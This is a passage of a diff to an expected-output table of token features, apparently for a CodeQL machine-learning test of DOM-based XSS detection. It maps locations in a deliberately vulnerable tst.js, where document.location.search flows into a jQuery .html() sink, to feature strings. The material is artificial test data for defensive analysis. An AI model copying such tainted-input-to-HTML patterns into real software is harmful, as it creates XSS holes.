URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target ... .search | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target ... .search | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:23 | document | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:23 | document | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:32 | document.location | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:32 | document.location | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:39 | documen ... .search | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:39 | documen ... .search | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:16:320:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:25:320:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:25:320:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:25:320:32 | location | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:25:320:32 | location | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:25:320:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:34:320:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:34:320:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:34:320:39 | search | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:34:320:39 | search | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:34:320:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:3 | $ | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:3 | $ | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | $('myId') | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | exceptional return of $('myId') | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:16 | $('myId').html | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | $('myId ... length) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | $('myId ... length) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | $('myId ... length) | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | $('myId ... length) | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | $('myId ... length) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | exceptional return of $('myId ... length) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | exceptional return of $('myId ... length) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | exceptional return of $('myId ... length) | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | exceptional return of $('myId ... length) | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:3:323:31 | exceptional return of $('myId ... length) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17233,6 +119679,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target length | | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | enclosingFunctionName | test2 | | autogenerated/Xss/DomBasedXss/tst.js:323:5:323:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:13:323:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:13:323:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:13:323:16 | html | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:13:323:16 | html | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:13:323:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:18:323:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:18:323:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:18:323:23 | target | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:18:323:23 | target | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:18:323:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17240,6 +119696,174 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | enclosingFunctionBody | target document location search $ myId html target length | | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | enclosingFunctionName | test2 | | autogenerated/Xss/DomBasedXss/tst.js:323:18:323:30 | target.length | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:323:25:323:30 | length | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:323:25:323:30 | length | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:323:25:323:30 | length | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:323:25:323:30 | length | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:323:25:323:30 | length | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:326:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:326:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:326:0 | this | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:326:0 | this | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:326:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | 'arguments' object of function getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | 'arguments' object of function getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | 'arguments' object of function getTaintedUrl | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | 'arguments' object of function getTaintedUrl | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | 'arguments' object of function getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | exceptional return of function getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | exceptional return of function getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | exceptional return of function getTaintedUrl | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | exceptional return of function getTaintedUrl | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | exceptional return of function getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | functio ... ion);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | functio ... ion);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | functio ... ion);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | return of function getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | return of function getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | return of function getTaintedUrl | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | return of function getTaintedUrl | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:326:1:328:1 | return of function getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | contextFunctionInterfaces | 